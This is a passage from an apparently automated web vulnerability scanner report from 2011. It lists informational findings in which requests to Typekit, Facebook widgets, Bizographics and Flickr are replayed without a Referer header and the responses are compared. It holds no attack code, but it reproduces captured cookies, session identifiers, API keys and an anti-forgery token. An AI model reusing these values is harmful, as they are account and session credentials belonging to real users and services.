Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1aYhlCGP6Vy1ExkNK7HUtFp4B4dlWpgdiiNEFpEQNZ6MT8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8Vej6qfzVOzTItNJRFsRyXovJB740eR263MFWr1XIQIIGVb5GOMA1TQtwBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 511
Connection: keep-alive

dj.module.ad.bio.loadBizoData({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{
...[SNIP]...

Request 2

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:14:15 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 21
Connection: keep-alive

Unknown Referer: null
15.2. http://use.typekit.com/k/nop2chq-e.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://use.typekit.com
Path:   /k/nop2chq-e.css

Request 1

GET /k/nop2chq-e.css?3bb2a6e53c9684ffdc9a9ef41d5b2a62256fcd127915b13baeee6002fa9af2ae560f28835041803c89dd552bfa879bec6f0a3d6c3e52259ab9cc77803e11552075df8db11b6d77bbe018472712039561894fec63818cc9679950ba9efa3d12295fc9eb6640175cf9b62c12398c312eff0d18d9e23e31e29e837ff53b114b3ccb4174bab7fa146af16b2aaa653a4d3f598cc0bbc141e225ffd38fc33dd99df9974aeee5588721af5cb0090fe7c5dfd698467edec989220bf0e5dfc2129b00777e50d9d2ce027a193570e3cca3588da3f13d7e47dcf4c210234fba4432c85dbf1ebb333475e16a18edec4a463417bcbd6435ea7adef2b3d6c13bd925bd654e01b0b1ee3e3eb0c83078151a1d70dd9ea4e701cc2db67539ee007f361ab37408104bd29e14b415b4a85f0843a19393010f87d365813b50e81b781677e10b67f1c601ad83aff7093d6860bdcf6ff5c504f05d311298e1db90f7daae5a155312cc8912f03df64e021dcd94a4778f4425b02a6d224b3e7d3cdc767f969968626a241f6cc854a3c697a811d1146eb053447218e4198d1b80ea73efec229b4c38b6341282cd71a8e8f6e252d9ceaea8 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://polldaddy.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/css
Date: Tue, 14 Jun 2011 00:33:02 GMT
ETag: "722523659+gzip"
Expires: Tue, 14 Jun 2011 00:38:02 GMT
Last-Modified: Fri, 04 Feb 2011 19:09:24 GMT
Server: ECS (dca/5335)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 70767

/*{"created":"2011-02-04T19:09:26Z","version":"2728970","mac":"1:11294a7c336eb9ea6661205ecb857afec96b975839859eddaa1bbd1cf21cfa5a","k":"0.7.26"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @name FF Tisa Web Pro
* @vendorname FontFont
* @vendorurl http://www.fontfont.com/
* @licenseurl http://typekit.com/fonts/237fb85c6b/eula
*
* (c) 2011 Small Batch Inc.
*/

@font-face {
font-family:"ff-tisa-web-pro-1";
src:url(data:font/opentype;base64,d09GRgABAAAAAGikABEAAAAA8EQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAABoiAAAABwAAAAcUlDNl0dQT1MAAGWgAAAC5QAABWYM7RUWR1NVQgAAZWwAAAAyAAAAQDXOTrBPUy8yAAAB9AAAAFcAAABggx57N2NtYXAAAARYAAABVQAAAZInj8gYY3Z0IAAABxAAAAAmAAAAJgOUCSxmcGdtAAAFsAAAAQIAAAFzBlmcN2dhc3AAAGVcAAAAEAAAABAAZwAKZ2x5ZgAACNwAAFkaAADaPL8aqOZoZWFkAAABgAAAADQAAAA29Jfg5GhoZWEAAAG0AAAAHwAAACQITQNFaG10eAAAAkwAAAIJAAADQLgVI69sb2NhAAAHOAAAAaIAAAGiSPsShm1heHAAAAHUAAAAIAAAACAC4AH8bmFtZQAAYfgAAAH+AAADzAuMyyhwb3N0AABj+AAAAWIAAAHXAcQQi3ByZXAAAAa0AAAAWwAAAIHrBQHCeNpjYGRgYGBvZNOyflgfz2/zlUGe+QVQhOHExT4rGP3/3r/PzHeZJwG5HAxMIFEAlawPDXjaY2BkYGDp/7ccSPL9v/d/P/NdBqAICrgAAKeAB5gAAAEAAADQAGQABQAAAAAAAQAAAAAACgAAAgABlwAAAAB42mNgZlJinMDAysDAdIUphoEBRjNWM7gwCgJ5jKwszIyMTIxMCxgY/jswKEQzQIFbsKcCA1BAUYnp6b+/TAws/YyRCgwMk0FyjLeZtgEpBQYmAGqFDkcAeNptks1LVFEYxp/3PaVjOEIOJagjmB8zhtN4m49SZ0yngeyi5gdNYFNUmiC4q2gZkuBS3Kq4UVrqzmXUqkW4yD+gKC
...[SNIP]...

Request 2

GET /k/nop2chq-e.css?3bb2a6e53c9684ffdc9a9ef41d5b2a62256fcd127915b13baeee6002fa9af2ae560f28835041803c89dd552bfa879bec6f0a3d6c3e52259ab9cc77803e11552075df8db11b6d77bbe018472712039561894fec63818cc9679950ba9efa3d12295fc9eb6640175cf9b62c12398c312eff0d18d9e23e31e29e837ff53b114b3ccb4174bab7fa146af16b2aaa653a4d3f598cc0bbc141e225ffd38fc33dd99df9974aeee5588721af5cb0090fe7c5dfd698467edec989220bf0e5dfc2129b00777e50d9d2ce027a193570e3cca3588da3f13d7e47dcf4c210234fba4432c85dbf1ebb333475e16a18edec4a463417bcbd6435ea7adef2b3d6c13bd925bd654e01b0b1ee3e3eb0c83078151a1d70dd9ea4e701cc2db67539ee007f361ab37408104bd29e14b415b4a85f0843a19393010f87d365813b50e81b781677e10b67f1c601ad83aff7093d6860bdcf6ff5c504f05d311298e1db90f7daae5a155312cc8912f03df64e021dcd94a4778f4425b02a6d224b3e7d3cdc767f969968626a241f6cc854a3c697a811d1146eb053447218e4198d1b80ea73efec229b4c38b6341282cd71a8e8f6e252d9ceaea8 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: max-age=300
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:33:08 GMT
Expires: Tue, 14 Jun 2011 00:38:08 GMT
Server: ECS (dca/5335)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>
15.3. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Request 1

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.55
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:20 GMT
Content-Length: 11488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4df6a7dc73dd15503205925" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></
...[SNIP]...

Request 2

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.39
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:47 GMT
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4df6a7f7ce3135860805850" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></
...[SNIP]...
15.4. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32597294c%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ffacebook.com%2FWSJ&layout=button_count&locale=en_US&node_type=link&ref=WSJ_homepage&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.35
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:01 GMT
Content-Length: 6317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4df6a7c9638865f38696850" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">305K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">305K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"3059cb0a",fb_dtsg:"AQBgWl1i"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"2HXxQ":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yY\/r\/SqDoi07-B2a.css"},"V02Ya":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y9\/r\/jUmyEs5927-.css"}});Bootloader.setResourceMap({"AcZ9A":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/ya\/r\/a8-71wQDIx3.js"},"evTQd":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yY\/r\/eptfJSfAjrr.js"},"JYXUq":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yQ\/r\/Ou0
...[SNIP]...

Request 2

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32597294c%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ffacebook.com%2FWSJ&layout=button_count&locale=en_US&node_type=link&ref=WSJ_homepage&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.135.32
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:17 GMT
Content-Length: 6244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4df6a7d992a591d71003908" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">305K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">305K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"5477fba4",fb_dtsg:"AQBgWl1i"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"2HXxQ":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yY\/r\/SqDoi07-B2a.css"},"V02Ya":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y9\/r\/jUmyEs5927-.css"}});Bootloader.setResourceMap({"AcZ9A":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/ya\/r\/a8-71wQDIx3.js"},"evTQd":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yY\/r\/eptfJSfAjrr.js"},"JYXUq":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yQ\/r\/Ou0
...[SNIP]...
15.5. http://www.flickr.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flickr.com
Path:   /about/

Request 1

GET /about/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response 1

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:29 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:29 GMT; path=/; domain=.flickr.com
X-Served-By: www14.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r23.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r22.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 70254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>About Flickr</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta na
...[SNIP]...
<img src="http://geo.yahoo.com/f?s=792600056&t=930d1e490833583cb7382149b9d3f2c5&r=http%3A%2F%2Fwww.flickr.com%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></div>

<a name="top"></a>







<div class="TopBar TopBarWide" id="TopBar" role="banner">
   <table cellspacing="0" class="Header" border="0">
       <tr>
           <td class="FlickrLogo">
